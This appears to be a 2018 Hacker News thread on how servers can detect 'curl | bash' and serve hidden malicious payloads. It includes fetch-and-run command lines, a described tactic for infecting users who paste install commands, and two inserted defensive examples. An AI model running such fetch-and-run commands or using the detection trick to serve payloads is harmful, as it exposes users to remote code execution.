zlacker

[parent] [thread] 8 comments
1. shawn+(OP) 2018-07-29 06:52:15
That's mistaken because:

  bash -c "`echo echo hi`"
note that `echo echo hi` is fully read, and then (and only then) passed to bash.

ditto for

  bash -c "`curl <your url>`"
The curl command isn't detectable as an evaluation because it's fully spliced into the string, then sent to bash. It's easy to imagine setting up a `curl <url> | sponge | bash` middleman, too.

It is impossible in general to know what the downstream user is going to do with the bytes you send. Even bash happens not to cache its input. But technically it could -- it would be entirely valid for bash to read in a buffered mode which waits for EOF before interpreting.

replies(1): >>charle+v
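As an added example (not part of shawn's comment or the thread), the difference between a pipe and a command substitution can be made visible without any network: a constructed local producer stands in for `curl <url>`, sends one line, pauses, then sends the rest and touches a marker file. A script line that tests for the marker tells you whether bash started executing before the sender finished (streamed) or only afterwards (buffered). The buffered form is the one that gives the server no timing signal to act on. The marker path and the producer are assumptions of this example, not anything from the thread.

```shell
# Added example, not from the thread. MARK and producer() are constructed here.
MARK="${TMPDIR:-/tmp}/stream_demo.$$"

producer() {
  # first line of the "script": report whether the sender has already finished
  printf 'if [ -e "%s" ]; then echo buffered; else echo streamed; fi\n' "$MARK"
  sleep 1                        # stand-in for a slow network transfer
  printf 'true\n'                # remainder of the "script"
  : > "$MARK"                    # the sender is done only at this point
}

# curl-style pipe: bash interprets each line as soon as it arrives
run_streamed() {
  rm -f "$MARK"
  producer | bash
  rm -f "$MARK"
}

# command substitution: the whole payload is read before bash sees any of it
run_buffered() {
  rm -f "$MARK"
  bash -c "$(producer)"
  rm -f "$MARK"
}
```

`run_streamed` prints `streamed` and `run_buffered` prints `buffered`; the only difference is whether bash was allowed to see the bytes before the transfer ended.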
2. charle+v 2018-07-29 07:02:06
>>shawn+(OP)
Which part is mistaken?

You're of course correct that the general problem is unsolvable - but the goal is to opportunistically infect people who directly paste the "curl example.com/setup | bash" that's helpfully provided in your getting started guide, without serving an obviously malicious payload to someone who could be inspecting it.

replies(1): >>shawn+p1
3. shawn+p1 2018-07-29 07:28:06
>>charle+v
Sorry, 2AM. You're right of course.

I think the real message is that this is a new class of timing attack, and that it should be treated as such. E.g. curl itself needs to be updated to buffer its own output.

replies(2): >>dotanc+W7 >>adrian+Wf
4. dotanc+W7 2018-07-29 10:29:43
>>shawn+p1
I disagree. Maybe a new tool that downloads and then runs a script from the interwebs needs to be written, but curl itself does one job and does it well.

I.e., curl is a *nix tool.

replies(1): >>laumar+zu
5. adrian+Wf 2018-07-29 12:52:59
>>shawn+p1
Or perhaps people shouldn't curl | bash? I don't want curl to buffer all output, I use it on devices with little RAM and do stream processing.
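As an added example, not from adrian's comment or the thread: the practical alternative to `curl | bash` is to fetch the whole script to disk, compare it against a hash published out of band, and only then run it. The fetch command is passed as a parameter (normally `curl -fsSL <url>`) so the example runs offline against a local file; the expected hash, the script contents and the helper names are constructed for this example.

```shell
# Added example (not from the thread): fetch, verify, then run.
# Usage: fetch_then_run <expected-sha256> <command that writes the script to stdout>
# e.g.   fetch_then_run "$HASH_FROM_DOCS" curl -fsSL https://example.com/setup   (assumed URL)
# Because the complete script is on disk before bash starts, the server sees the
# same transfer whether you execute the bytes, read them, or throw them away.

sha256_of() {
  # hex SHA-256 of a file; falls back across the tools commonly available
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  elif command -v shasum >/dev/null 2>&1; then
    shasum -a 256 "$1" | cut -d' ' -f1
  else
    openssl dgst -sha256 "$1" | sed 's/.*= //'
  fi
}

fetch_then_run() {
  expected="$1"; shift
  tmp="$(mktemp)" || return 1
  # 1. download everything first; nothing is interpreted while bytes arrive
  if ! "$@" > "$tmp"; then
    echo "fetch failed" >&2; rm -f "$tmp"; return 2
  fi
  # 2. compare against the hash obtained out of band (docs, signed release notes)
  actual="$(sha256_of "$tmp")"
  if [ "$actual" != "$expected" ]; then
    echo "refusing to run: sha256 $actual != expected $expected" >&2
    rm -f "$tmp"; return 3
  fi
  # 3. only now hand the verified file to bash
  bash "$tmp"; rc=$?
  rm -f "$tmp"
  return "$rc"
}
```

A hash mismatch returns non-zero before bash is ever invoked, so a payload that differs from what the documentation promised never executes; a truncated transfer fails the same check instead of running half a script.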
6. laumar+zu 2018-07-29 16:07:04
>>dotanc+W7
> Maybe a new tool that downloads and then runs a script from the interwebs needs to be written

What you're describing there is a package manager. What we don't need is a tool for running any random script from the wider internet.

replies(2): >>gkya+Mx >>allann+NB
7. gkya+Mx 2018-07-29 16:41:53
>>laumar+zu
Isn't that tool what we call a "user"?
replies(1): >>jchook+Fb1
8. allann+NB 2018-07-29 17:26:25
>>laumar+zu
Yet Another Package Manager :) Seriously - you're right, but people use curl | bash because it's super simple/fast and usually just works. Package managers can be an intimidating mess; even the choices we have in package managers confound things these days - did I install that with apt? snap? npm? pip? aw, crap, that program I just installed with pip isn't working because I'd already installed a version with apt and some of its configuration isn't compatible!!!

It's a mess. I really like snaps, but I hesitate for this reason - safer to default to apt on my ubuntu machine.

[edit] by safer I meant 'less likely for me to get confused and so screw up something', not meant as a security comment.

9. jchook+Fb1 2018-07-30 01:29:22
>>gkya+Mx
Sick burn.